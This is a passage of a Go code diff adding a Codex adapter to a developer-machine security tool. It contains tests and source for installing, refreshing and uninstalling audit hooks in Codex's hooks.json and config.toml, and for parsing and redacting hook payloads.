innerPre["command"] != commandFor(HookPreToolUse) { + t.Errorf("PreToolUse command: %v (want %s)", innerPre["command"], commandFor(HookPreToolUse)) + } + if innerPre["timeout"].(float64) != 30 { + 
t.Errorf("PreToolUse timeout: %v", innerPre["timeout"]) + } + // SessionStart matcher is the literal startup|resume|clear. + ss := hooksMap["SessionStart"].([]any)[0].(map[string]any) + if ss["matcher"] != "startup|resume|clear" { + t.Errorf("SessionStart matcher: %v", ss["matcher"]) + } + // UserPromptSubmit and Stop omit matcher. + ups := hooksMap["UserPromptSubmit"].([]any)[0].(map[string]any) + if _, has := ups["matcher"]; has { + t.Errorf("UserPromptSubmit must omit matcher: %v", ups) + } + stop := hooksMap["Stop"].([]any)[0].(map[string]any) + if _, has := stop["matcher"]; has { + t.Errorf("Stop must omit matcher: %v", stop) + } + + // Feature flag. + cfgMap := readTOML(t, cfg) + features, ok := cfgMap["features"].(map[string]any) + if !ok { + t.Fatalf("features table missing: %v", cfgMap) + } + if features["codex_hooks"] != true { + t.Errorf("codex_hooks not true: %v", features) + } + + // InstallResult tracks both files written under root chown. + if !slices.Contains(res.WrittenFiles, hooks) { + t.Errorf("WrittenFiles missing hooks.json: %v", res.WrittenFiles) + } + if !slices.Contains(res.WrittenFiles, cfg) { + t.Errorf("WrittenFiles missing config.toml: %v", res.WrittenFiles) + } +} + +func TestInstallPreservesUnrelatedHooksAndConfig(t *testing.T) { + a, _, hooks, cfg := withCodexFiles(t, + `{ + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"type": "command", "command": "echo user"}]} + ], + "PluginEvent": [ + {"matcher": "*", "hooks": [{"type": "command", "command": "echo plugin"}]} + ] + } + }`, + `model = "gpt-5" +[features] +other_flag = true +`) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got := readJSON(t, hooks) + hooksMap := got["hooks"].(map[string]any) + pre := hooksMap["PreToolUse"].([]any) + commands := []string{} + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + commands = append(commands, 
hm["command"].(string)) + } + } + joined := strings.Join(commands, "\n") + if !strings.Contains(joined, "echo user") { + t.Errorf("user PreToolUse hook lost; got %q", joined) + } + if !strings.Contains(joined, commandFor(HookPreToolUse)) { + t.Errorf("DMG PreToolUse hook missing; got %q", joined) + } + if _, ok := hooksMap["PluginEvent"]; !ok { + t.Error("unrelated PluginEvent removed") + } + + cfgMap := readTOML(t, cfg) + if cfgMap["model"] != "gpt-5" { + t.Errorf("unrelated config key lost: %v", cfgMap) + } + features := cfgMap["features"].(map[string]any) + if features["other_flag"] != true { + t.Errorf("unrelated features key lost: %v", features) + } + if features["codex_hooks"] != true { + t.Errorf("codex_hooks not enabled: %v", features) + } +} + +func TestInstallIdempotent(t *testing.T) { + a, _, hooks, _ := newCodexHome(t) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + first := readJSON(t, hooks) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + second := readJSON(t, hooks) + firstBytes, _ := json.Marshal(first) + secondBytes, _ := json.Marshal(second) + if string(firstBytes) != string(secondBytes) { + t.Errorf("install not idempotent:\n first %s\n second %s", firstBytes, secondBytes) + } +} + +func TestInstallOnMalformedTOMLFails(t *testing.T) { + a, _, _, _ := withCodexFiles(t, "", `[features +broken`) + if _, err := a.Install(context.Background()); err == nil { + t.Fatal("expected install error on malformed TOML") + } +} + +// TestInstallMalformedTOMLDoesNotMutateHooks asserts the multi-file +// safety invariant: a malformed config.toml must abort install BEFORE +// hooks.json is touched. Otherwise an install can leave hooks.json +// mutated while config.toml stays broken — a forbidden partial-write +// state. 
+func TestInstallMalformedTOMLDoesNotMutateHooks(t *testing.T) { + a, _, hooks, _ := withCodexFiles(t, + `{"hooks":{"PreToolUse":[{"matcher":"Bash","hooks":[{"type":"command","command":"echo user"}]}]}}`, + `[features +broken`) + original, err := os.ReadFile(hooks) + if err != nil { + t.Fatal(err) + } + if _, err := a.Install(context.Background()); err == nil { + t.Fatal("expected install error on malformed TOML") + } + got, _ := os.ReadFile(hooks) + if string(got) != string(original) { + t.Errorf("hooks.json must not be mutated when config.toml fails:\n pre %s\n post %s", original, got) + } + matches, _ := filepath.Glob(hooks + ".dmg-*.bak") + if len(matches) > 0 { + t.Errorf("hooks.json backup should not exist on aborted install: %v", matches) + } +} + +// TestInstallMovesManagedEntryFromStaleMatcher: a pre-existing managed +// entry under the wrong matcher (e.g. PreToolUse pinned to `Bash`) +// silently narrows audit coverage. Install must move it to the desired +// matcher. +func TestInstallMovesManagedEntryFromStaleMatcher(t *testing.T) { + staleBody := `{ + "hooks": { + "PreToolUse": [ + {"matcher":"Bash","hooks":[ + {"type":"command","command":"` + commandFor(HookPreToolUse) + `","timeout":30,"statusMessage":"old"} + ]} + ] + } + }` + a, _, hooks, _ := withCodexFiles(t, staleBody, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got := readJSON(t, hooks) + pre := got["hooks"].(map[string]any)["PreToolUse"].([]any) + for _, raw := range pre { + group := raw.(map[string]any) + matcher, _ := group["matcher"].(string) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + cmd, _ := hm["command"].(string) + if isManagedCommand(cmd) && matcher != "*" { + t.Errorf("managed entry remained under stale matcher %q: %+v", matcher, group) + } + } + } +} + +// TestInstallRefreshesStaleBinaryPath asserts the binary-move +// self-heal: when hooks.json contains a managed entry pointing at an +// old absolute path, a 
fresh install rewrites the command in-place. +// Without this, `brew upgrade` (which relocates the binary in the +// Cellar) would silently break hooks. +func TestInstallRefreshesStaleBinaryPath(t *testing.T) { + stalePath := "/old/path/stepsecurity-dev-machine-guard" + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + stalePath + ` _hook codex PreToolUse","timeout":30,"statusMessage":"old"}]}]}}` + a, _, hooks, _ := withCodexFiles(t, body, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + out, _ := os.ReadFile(hooks) + if strings.Contains(string(out), stalePath) { + t.Errorf("stale binary path not refreshed: %s", out) + } + if !strings.Contains(string(out), testBinary) { + t.Errorf("new binary path not written: %s", out) + } +} + +// rootKeyOrder returns the top-level JSON object keys of path in +// source order. +func rootKeyOrder(t *testing.T, path string) []string { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + dec := json.NewDecoder(strings.NewReader(string(b))) + tok, err := dec.Token() + if err != nil || tok != json.Delim('{') { + t.Fatalf("expected root '{', got %v err %v", tok, err) + } + var keys []string + for dec.More() { + k, err := dec.Token() + if err != nil { + t.Fatal(err) + } + keys = append(keys, k.(string)) + var raw json.RawMessage + if err := dec.Decode(&raw); err != nil { + t.Fatal(err) + } + } + return keys +} + +func TestInstallPreservesHooksJSONKeyOrder(t *testing.T) { + a, _, hooks, _ := withCodexFiles(t, `{ + "z": "last", + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + }, + "a": "first" + }`, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + if got, want := rootKeyOrder(t, hooks), []string{"z", "hooks", "a"}; !slices.Equal(got, want) { + t.Errorf("root key order: got %v, want %v", got, want) + } + b, _ := 
os.ReadFile(hooks) + out := string(b) + userIdx := strings.Index(out, `"echo user"`) + if userIdx < 0 { + t.Fatalf("user hook not found in output: %s", out) + } + entryStart := strings.LastIndex(out[:userIdx], "{") + entryEnd := strings.Index(out[userIdx:], "}") + entry := out[entryStart : userIdx+entryEnd+1] + tIdx := strings.Index(entry, `"timeout"`) + yIdx := strings.Index(entry, `"type"`) + cIdx := strings.Index(entry, `"command"`) + if !(tIdx >= 0 && tIdx < yIdx && yIdx < cIdx) { + t.Errorf("user hook key order lost; entry: %s", entry) + } +} + +func TestInstallPreservesConfigTOMLBytes(t *testing.T) { + a, _, _, cfg := withCodexFiles(t, "", `# user header comment +model = "gpt-5" + +[features] +sandbox = "workspace-write" + +[telemetry] +enabled = true +`) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got, _ := os.ReadFile(cfg) + s := string(got) + for _, want := range []string{ + "# user header comment", + `model = "gpt-5"`, + `sandbox = "workspace-write"`, + "[telemetry]", + "enabled = true", + "codex_hooks = true", + } { + if !strings.Contains(s, want) { + t.Errorf("expected %q in output; got: %s", want, s) + } + } + // Order: telemetry must still come AFTER features (which now contains codex_hooks). + featIdx := strings.Index(s, "[features]") + telIdx := strings.Index(s, "[telemetry]") + chIdx := strings.Index(s, "codex_hooks") + if !(featIdx < chIdx && chIdx < telIdx) { + t.Errorf("table order disturbed: %s", s) + } +} + +// TestInstallSecondInstallIsByteStableNoOp: the codex hooks.json +// install path skips backup + write entirely when the file is already +// in desired state. 
+func TestInstallSecondInstallIsByteStableNoOp(t *testing.T) { + a, _, hooks, _ := newCodexHome(t) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + before, _ := os.ReadFile(hooks) + matches, _ := filepath.Glob(hooks + ".dmg-*.bak") + beforeBackups := len(matches) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatal(err) + } + after, _ := os.ReadFile(hooks) + if !bytes.Equal(before, after) { + t.Errorf("idempotent install rewrote hooks.json") + } + matches, _ = filepath.Glob(hooks + ".dmg-*.bak") + if len(matches) != beforeBackups { + t.Errorf("idempotent install created a new backup: %v", matches) + } + if slices.Contains(res.WrittenFiles, hooks) { + t.Errorf("expected hooks.json absent from WrittenFiles on no-op install, got %v", res.WrittenFiles) + } +} + +func TestInstallNoOpDoesNotRewriteConfigTOML(t *testing.T) { + a, _, _, cfg := withCodexFiles(t, "", `[features] +codex_hooks = true +sandbox = "workspace-write" +`) + original, _ := os.ReadFile(cfg) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got, _ := os.ReadFile(cfg) + if string(got) != string(original) { + t.Errorf("config.toml byte-mutated despite already-enabled flag:\n pre %s\n post %s", original, got) + } + matches, _ := filepath.Glob(cfg + ".dmg-*.bak") + if len(matches) > 0 { + t.Errorf("unexpected backup created: %v", matches) + } +} + +// TestInstallCreatesParentDirWhenAbsent asserts that Install can run +// against a fresh home without ~/.codex/ existing — the atomicfile +// layer creates parent dirs and reports them in CreatedDirs so the +// install handler can chown them under root. 
+func TestInstallCreatesParentDirWhenAbsent(t *testing.T) { + a, home, _, _ := newCodexHome(t) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + codexDir := filepath.Join(home, ".codex") + if _, statErr := os.Stat(codexDir); statErr != nil { + t.Errorf("~/.codex/ not created: %v", statErr) + } + if !slices.Contains(res.CreatedDirs, codexDir) { + t.Errorf("CreatedDirs missing %q: got %v", codexDir, res.CreatedDirs) + } +} + +// ---------- Uninstall ---------- + +func TestUninstallLeavesUnrelatedHooks(t *testing.T) { + body := `{ + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [ + {"type": "command", "command": "stepsecurity-dev-machine-guardctl status"}, + {"type": "command", "command": "/usr/local/bin/other-tool _hook claude-code PreToolUse"}, + {"type": "command", "command": "echo user"} + ]} + ] + } + }` + a, _, hooks, _ := withCodexFiles(t, body, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + res, err := a.Uninstall(context.Background()) + if err != nil { + t.Fatal(err) + } + if len(res.HooksRemoved) == 0 { + t.Fatal("expected at least one hook removed") + } + got := readJSON(t, hooks) + hooksMap, _ := got["hooks"].(map[string]any) + if hooksMap == nil { + t.Fatal("hooks key removed despite remaining user entries") + } + pre := hooksMap["PreToolUse"].([]any) + survivors := []string{} + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + cmd := hm["command"].(string) + survivors = append(survivors, cmd) + if isManagedCommand(cmd) { + t.Errorf("managed command survived uninstall: %q", cmd) + } + } + } + for _, want := range []string{ + "stepsecurity-dev-machine-guardctl status", + "/usr/local/bin/other-tool _hook claude-code PreToolUse", + "echo user", + } { + if !slices.Contains(survivors, want) { + t.Errorf("user/lookalike hook %q removed; survivors=%v", want, survivors) + } + } + 
noteSeen := false + for _, n := range res.Notes { + if strings.Contains(n, "feature flag") { + noteSeen = true + } + } + if !noteSeen { + t.Errorf("expected feature-flag note: %v", res.Notes) + } +} + +// TestUninstallPreservesUserHookAfterManagedEntry covers the +// array-shift bug fixed by the gjson/sjson refactor — the previous +// span-based renderer matched array elements by index, so removing +// the managed entry at index 0 could overwrite the user entry that +// shifted into index 0. +func TestUninstallPreservesUserHookAfterManagedEntry(t *testing.T) { + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + commandFor(HookPreToolUse) + `","timeout":30,"statusMessage":"dev-machine-guard: checking tool use"},{"timeout":5,"type":"command","command":"echo user"}]}]}}` + a, _, hooks, _ := withCodexFiles(t, body, "") + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatal(err) + } + out, _ := os.ReadFile(hooks) + if !strings.Contains(string(out), `"command": "echo user"`) { + t.Fatalf("user hook after managed entry was lost: %s", out) + } + if isManagedCommand(string(out)) && strings.Contains(string(out), commandFor(HookPreToolUse)) { + t.Fatalf("managed entry survived uninstall: %s", out) + } +} + +func TestUninstallPreservesHooksJSONUserKeyOrder(t *testing.T) { + a, _, hooks, _ := withCodexFiles(t, `{ + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + } + }`, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatal(err) + } + b, _ := os.ReadFile(hooks) + out := string(b) + if !strings.Contains(out, "echo user") { + t.Fatalf("user hook lost on uninstall: %s", out) + } + userIdx := strings.Index(out, `"echo user"`) + entryStart := strings.LastIndex(out[:userIdx], "{") + entryEnd := strings.Index(out[userIdx:], "}") + entry := 
out[entryStart : userIdx+entryEnd+1] + tIdx := strings.Index(entry, `"timeout"`) + yIdx := strings.Index(entry, `"type"`) + cIdx := strings.Index(entry, `"command"`) + if !(tIdx >= 0 && tIdx < yIdx && yIdx < cIdx) { + t.Errorf("user hook key order lost on uninstall; entry: %s", entry) + } +} + +func TestUninstallLeavesFeatureFlagEnabled(t *testing.T) { + // Uninstall must NOT revert `[features].codex_hooks = true`. Other + // tools may have wired up their own hooks that depend on it being on. + a, _, _, cfg := newCodexHome(t) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatal(err) + } + cfgMap := readTOML(t, cfg) + features, ok := cfgMap["features"].(map[string]any) + if !ok { + t.Fatalf("features table missing after uninstall: %v", cfgMap) + } + if features["codex_hooks"] != true { + t.Errorf("codex_hooks was reverted on uninstall: %v", features) + } +} diff --git a/internal/aiagents/adapter/codex/hooks.go b/internal/aiagents/adapter/codex/hooks.go new file mode 100644 index 0000000..489540c --- /dev/null +++ b/internal/aiagents/adapter/codex/hooks.go @@ -0,0 +1,58 @@ +package codex + +import "github.com/step-security/dev-machine-guard/internal/aiagents/event" + +// Codex-native hook event names. These are kept in this package and +// NOT promoted to internal/aiagents/event so cross-agent code (policy, +// runtime) cannot branch on them — branching MUST go through +// event.HookPhase instead. +const ( + HookSessionStart event.HookEvent = "SessionStart" + HookPreToolUse event.HookEvent = "PreToolUse" + HookPermissionRequest event.HookEvent = "PermissionRequest" + HookPostToolUse event.HookEvent = "PostToolUse" + HookUserPromptSubmit event.HookEvent = "UserPromptSubmit" + HookStop event.HookEvent = "Stop" +) + +// supportedHookEvents is the install order. 
Append-only — order is +// significant for install/uninstall reproducibility and shows up in +// user-facing diagnostics. +var supportedHookEvents = []event.HookEvent{ + HookSessionStart, + HookPreToolUse, + HookPermissionRequest, + HookPostToolUse, + HookUserPromptSubmit, + HookStop, +} + +// SupportedHooks returns a fresh copy of the Codex-supported hook list. +// Callers may freely mutate the returned slice without affecting +// adapter internals. +func (a *Adapter) SupportedHooks() []event.HookEvent { + out := make([]event.HookEvent, len(supportedHookEvents)) + copy(out, supportedHookEvents) + return out +} + +// phaseFor maps a Codex native hook event onto the normalized hook +// phase. Cross-agent consumers (policy, filtering) branch on phase; +// adapter-specific consumers may still inspect HookEvent. +func phaseFor(h event.HookEvent) event.HookPhase { + switch h { + case HookSessionStart: + return event.HookPhaseSessionStart + case HookPreToolUse: + return event.HookPhasePreTool + case HookPermissionRequest: + return event.HookPhasePermissionRequest + case HookPostToolUse: + return event.HookPhasePostTool + case HookUserPromptSubmit: + return event.HookPhaseUserPrompt + case HookStop: + return event.HookPhaseStop + } + return event.HookPhaseUnknown +} diff --git a/internal/aiagents/adapter/codex/parse.go b/internal/aiagents/adapter/codex/parse.go new file mode 100644 index 0000000..0fcf18d --- /dev/null +++ b/internal/aiagents/adapter/codex/parse.go @@ -0,0 +1,161 @@ +package codex + +import ( + "context" + "encoding/json" + "fmt" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// ParseEvent normalizes a Codex hook stdin payload into a DMG event. +// The raw payload is REDACTED before being attached to the result; +// the original bytes never appear in the returned event. 
func (a *Adapter) ParseEvent(ctx context.Context, hookType event.HookEvent, raw []byte) (*event.Event, error) {
	// ctx is currently unused: parsing is pure in-memory work with no
	// I/O to cancel.
	var generic map[string]any
	if err := json.Unmarshal(raw, &generic); err != nil {
		return nil, fmt.Errorf("codex parse: %w", err)
	}
	// A JSON `null` body unmarshals into a nil map; normalize so the
	// stringField lookups below are safe.
	if generic == nil {
		generic = map[string]any{}
	}

	ev := &event.Event{
		SchemaVersion: event.SchemaVersion,
		EventID:       event.NewEventID(),
		Timestamp:     time.Now().UTC(),
		AgentName:     AgentName,
		HookEvent:     hookType,
		HookPhase:     phaseFor(hookType),
		ResultStatus:  event.ResultObserved,
	}

	// Common envelope fields; absent or non-string values yield "".
	ev.SessionID = stringField(generic, "session_id")
	ev.WorkingDirectory = stringField(generic, "cwd")
	ev.PermissionMode = stringField(generic, "permission_mode")
	ev.ToolName = stringField(generic, "tool_name")
	ev.ToolUseID = stringField(generic, "tool_use_id")

	// Cross-check: the CLI arg names which hook command Codex
	// invoked. On disagreement, keep runtime behavior tied to that
	// hook and record the payload mismatch for audit. The payload
	// claim is not persisted as a field of its own — ev.HookEvent is
	// the single source of truth.
	if claimed := stringField(generic, "hook_event_name"); claimed != "" && claimed != string(hookType) {
		ev.Errors = append(ev.Errors, event.ErrorInfo{
			Stage:   "parse",
			Code:    "hook_event_name_mismatch",
			Message: "cli arg=" + string(hookType) + " payload=" + claimed,
		})
	}

	ev.ActionType = inferActionType(ev.HookEvent, ev.ToolName)

	// Codex has no separate documented failure hook; PostToolUse
	// means the tool completed. Treat it as success unless future
	// Codex versions expose a richer status field.
	if ev.HookPhase == event.HookPhasePostTool {
		ev.ResultStatus = event.ResultSuccess
	}

	// Scrub bulky fields, then pass the result through redact.Value
	// before attaching it to the event.
	// NOTE(review): if redact.Value returns a non-map, the scrubbed
	// but otherwise unredacted map is attached as-is — presumably
	// redact.Value always returns a map for map input; confirm.
	cleaned := scrubPayload(generic)
	if v, ok := redact.Value(cleaned).(map[string]any); ok {
		ev.Payload = v
	} else {
		ev.Payload = cleaned
	}

	// Sensitivity is judged on the ORIGINAL payload, before scrubbing.
	ev.IsSensitive = isSensitivePayload(generic)

	return ev, nil
}

// scrubPayload swaps bulky / sensitive fields for presence markers
// but preserves audit-evidence fields (prompt, transcript_path,
// source).
func scrubPayload(p map[string]any) map[string]any {
	out := make(map[string]any, len(p))
	for k, v := range p {
		// Keys match case-insensitively, but the presence marker keeps
		// the original key casing (e.g. "Stdout" -> "Stdout_present").
		switch strings.ToLower(k) {
		case "transcript", "messages", "stdout", "stderr", "content":
			out[k+"_present"] = true
		case "last_assistant_message":
			out["last_assistant_message_present"] = true
		default:
			out[k] = v
		}
	}
	return out
}

// inferActionType is only meaningful for PreToolUse and PostToolUse.
// PermissionRequest, SessionStart, UserPromptSubmit, and Stop leave
// the field empty — the hook_event field already names the lifecycle
// phase, and permission events describe a decision around a tool call
// rather than a tool call itself.
func inferActionType(hookEvent event.HookEvent, toolName string) event.ActionType {
	switch hookEvent {
	case HookPreToolUse, HookPostToolUse:
	default:
		return ""
	}
	switch {
	case toolName == "Bash":
		return event.ActionCommandExec
	case toolName == "apply_patch":
		return event.ActionFileWrite
	case strings.HasPrefix(toolName, "mcp__"):
		return event.ActionMCPInvocation
	case toolName == "":
		return ""
	default:
		return event.ActionToolUse
	}
}

// ShellCommand extracts the redacted shell command from a parsed
// Codex event. Returns ok=false for everything except `Bash`.
// apply_patch's tool_input.command is a patch payload, not shell
// input.
+func (a *Adapter) ShellCommand(ev *event.Event) (cmd string, cwd string, ok bool) { + if ev == nil || ev.Payload == nil { + return "", "", false + } + if ev.ToolName != "Bash" { + return "", ev.WorkingDirectory, false + } + ti, _ := ev.Payload["tool_input"].(map[string]any) + if ti == nil { + return "", ev.WorkingDirectory, false + } + c, _ := ti["command"].(string) + if c == "" { + return "", ev.WorkingDirectory, false + } + wd, _ := ti["cwd"].(string) + if wd == "" { + wd = ev.WorkingDirectory + } + return c, wd, true +} + +func isSensitivePayload(p map[string]any) bool { + ti, ok := p["tool_input"].(map[string]any) + if !ok { + return false + } + for _, key := range []string{"file_path", "path", "filename"} { + if v, ok := ti[key].(string); ok && redact.IsSensitivePath(v) { + return true + } + } + return false +} + +func stringField(m map[string]any, k string) string { + v, _ := m[k].(string) + return v +} diff --git a/internal/aiagents/adapter/codex/settings.go b/internal/aiagents/adapter/codex/settings.go new file mode 100644 index 0000000..1a8f683 --- /dev/null +++ b/internal/aiagents/adapter/codex/settings.go @@ -0,0 +1,456 @@ +package codex + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io/fs" + "os" + "regexp" + "slices" + + toml "github.com/pelletier/go-toml/v2" + "github.com/tidwall/gjson" + "github.com/tidwall/pretty" + "github.com/tidwall/sjson" + + "github.com/step-security/dev-machine-guard/internal/aiagents/atomicfile" + "github.com/step-security/dev-machine-guard/internal/aiagents/configedit" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +const ( + hookTimeoutSeconds = 30 + matcherAll = "*" + matcherSession = "startup|resume|clear" + settingsMode = os.FileMode(0o600) + statusMessagePrefix = "dev-machine-guard" +) + +// managedCmdRE is the uninstall match criterion. It matches an entry's +// `command` field when the executable token is the DMG binary, +// regardless of which absolute path it sits behind. 
The `(^|/)` +// left-side accepts both bare invocations and absolute-path +// invocations, while rejecting prefix collisions like +// `mystepsecurity-dev-machine-guard`. +// +// The regex is kept identical to the claudecode adapter's so a single +// grep covers both. +var managedCmdRE = regexp.MustCompile(`(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`) + +// hooksDoc holds raw bytes for ~/.codex/hooks.json. orig is the bytes +// as read from disk (nil if the file did not exist); json is the +// in-memory mutation buffer that starts equal to orig (or `{}` when +// the file is missing/empty). All edits go through tidwall/sjson so +// unrelated user formatting is preserved byte-for-byte. +type hooksDoc struct { + orig []byte + json []byte +} + +func loadHooksDoc(path string) (*hooksDoc, error) { + b, err := os.ReadFile(path) + if err != nil { + if errors.Is(err, fs.ErrNotExist) { + return &hooksDoc{json: []byte(`{}`)}, nil + } + return nil, fmt.Errorf("codex hooks read: %w", err) + } + normalized, err := configedit.NormalizeJSONObject(b) + if err != nil { + return nil, fmt.Errorf("codex hooks parse: %w", err) + } + return &hooksDoc{orig: b, json: normalized}, nil +} + +func hookEventPath(hookType event.HookEvent) string { + return configedit.Path("hooks", string(hookType)) +} + +func statusMessageFor(hookType event.HookEvent) string { + switch hookType { + case HookSessionStart: + return statusMessagePrefix + ": recording Codex session" + case HookPreToolUse: + return statusMessagePrefix + ": checking tool use" + case HookPermissionRequest: + return statusMessagePrefix + ": checking approval request" + case HookPostToolUse: + return statusMessagePrefix + ": recording tool result" + case HookUserPromptSubmit: + return statusMessagePrefix + ": recording prompt" + case HookStop: + return statusMessagePrefix + ": recording turn stop" + } + return statusMessagePrefix +} + +// matcherFor returns the matcher for a hook event, or "" when the +// matcher key should be 
omitted entirely from the matcher group. +// Codex is more particular than Claude Code about matchers — only +// SessionStart and the tool-use family carry one. +func matcherFor(hookType event.HookEvent) string { + switch hookType { + case HookSessionStart: + return matcherSession + case HookPreToolUse, HookPermissionRequest, HookPostToolUse: + return matcherAll + } + return "" +} + +// codexHookEntry is the inner record shape Codex expects. DMG entries +// are identified on uninstall by `managedCmdRE` matching the command +// field, not by a metadata marker. +type codexHookEntry struct { + Type string `json:"type"` + Command string `json:"command"` + Timeout int `json:"timeout"` + StatusMessage string `json:"statusMessage"` +} + +func desiredHookEntry(hookType event.HookEvent, command string) codexHookEntry { + return codexHookEntry{ + Type: "command", + Command: command, + Timeout: hookTimeoutSeconds, + StatusMessage: statusMessageFor(hookType), + } +} + +// isManagedCommand reports whether cmd is a DMG-installed hook entry. +// Hook entries from other tools are intentionally not matched. +func isManagedCommand(cmd string) bool { + return managedCmdRE.MatchString(cmd) +} + +// upsertHook ensures exactly one DMG entry exists for hookType under +// the desired matcher, preserving every unrelated user matcher and +// inner hook. DMG entries under any other matcher are dropped (and +// recreated under the desired matcher) so audit coverage always +// tracks the install desired state. +// +// command is the literal string to write into the entry's `command` +// field — the adapter computes it via a.commandFor(hookType) so the +// settings document never embeds the binary path resolution logic. +// +// Always-refresh: when a managed entry already sits under the desired +// matcher, its type/command/timeout/statusMessage fields are rewritten +// in place via sjson (preserving any extra keys the user added). 
This +// self-heals the binary-move case — matching the claudecode adapter's +// behavior at zero extra cost. +func (d *hooksDoc) upsertHook(hookType event.HookEvent, command string) (added bool) { + want := desiredHookEntry(hookType, command) + wantMatcher := matcherFor(hookType) + wantRaw, err := configedit.MarshalRawJSON(want) + if err != nil { + return false + } + path := hookEventPath(hookType) + list := gjson.GetBytes(d.json, path).Array() + + outGroups := make([]string, 0, len(list)+1) + placed := false + listChanged := false + + for _, group := range list { + if !group.IsObject() { + outGroups = append(outGroups, group.Raw) + continue + } + matcher := group.Get("matcher").String() + inner := group.Get("hooks").Array() + + filtered := make([]string, 0, len(inner)+1) + groupChanged := false + for _, h := range inner { + if !h.IsObject() { + filtered = append(filtered, h.Raw) + continue + } + cmd := h.Get("command").String() + if !isManagedCommand(cmd) { + filtered = append(filtered, h.Raw) + continue + } + // Managed entry. Refresh + keep ONLY when this group's + // matcher matches the desired matcher and we have not yet + // placed one; otherwise drop so the desired-matcher group + // receives it. + if matcher == wantMatcher && !placed { + refreshed, err := refreshManagedEntry(h.Raw, want) + if err != nil { + return false + } + if refreshed != h.Raw { + groupChanged = true + } + filtered = append(filtered, refreshed) + placed = true + continue + } + // drop: stale matcher or duplicate. + groupChanged = true + } + // If this group has the desired matcher and we still need to + // place the managed entry, insert it here so we don't append a + // new group for a matcher that already exists. 
+ if matcher == wantMatcher && !placed { + filtered = append(filtered, wantRaw) + placed = true + groupChanged = true + } + if len(filtered) == 0 { + listChanged = true + continue + } + if !groupChanged { + outGroups = append(outGroups, group.Raw) + continue + } + updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filtered))) + if err != nil { + return false + } + outGroups = append(outGroups, string(updated)) + listChanged = true + } + + if !placed { + groupRaw, err := newGroupRaw(wantMatcher, wantRaw) + if err != nil { + return false + } + outGroups = append(outGroups, groupRaw) + added = true + listChanged = true + } + + if !listChanged { + return added + } + + patched, err := configedit.SetRaw(d.json, path, configedit.RawArray(outGroups)) + if err != nil { + return false + } + d.json = patched + return added +} + +// newGroupRaw builds the matcher-group JSON: with `matcher` when +// wantMatcher is non-empty, omitting it otherwise. +func newGroupRaw(wantMatcher, hookRaw string) (string, error) { + if wantMatcher == "" { + group := struct { + Hooks []json.RawMessage `json:"hooks"` + }{Hooks: []json.RawMessage{json.RawMessage(hookRaw)}} + return configedit.MarshalRawJSON(group) + } + group := struct { + Matcher string `json:"matcher"` + Hooks []json.RawMessage `json:"hooks"` + }{Matcher: wantMatcher, Hooks: []json.RawMessage{json.RawMessage(hookRaw)}} + return configedit.MarshalRawJSON(group) +} + +// refreshManagedEntry rewrites type, command, timeout, and +// statusMessage on an existing DMG hook entry while preserving every +// other key the user might have added. Used so that a `hooks install` +// re-run after the binary path changes (e.g. `brew upgrade` relocated +// it) updates the absolute path in-place rather than leaving a stale +// entry behind. 
+func refreshManagedEntry(rawEntry string, want codexHookEntry) (string, error) { + out := []byte(rawEntry) + var err error + out, err = sjson.SetBytes(out, "type", want.Type) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "command", want.Command) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "timeout", want.Timeout) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "statusMessage", want.StatusMessage) + if err != nil { + return "", err + } + return string(out), nil +} + +// removeManagedHooks strips every DMG-owned entry (regex match on +// managedCmdRE). Returns the hook events from which at least one entry +// was removed. binaryPath is reserved for future scoping (e.g., +// "remove only entries pointing at this specific binary"); today we +// remove any entry whose command matches managedCmdRE, regardless of +// the path token. +func (d *hooksDoc) removeManagedHooks(binaryPath string) []event.HookEvent { + _ = binaryPath + var removed []event.HookEvent + hooksRoot := gjson.GetBytes(d.json, "hooks") + if !hooksRoot.IsObject() { + return nil + } + + type hookKeyEntry struct { + key string + list []gjson.Result + } + var events []hookKeyEntry + hooksRoot.ForEach(func(k, v gjson.Result) bool { + if v.IsArray() { + events = append(events, hookKeyEntry{key: k.String(), list: v.Array()}) + } + return true + }) + + for _, ev := range events { + outGroups := make([]string, 0, 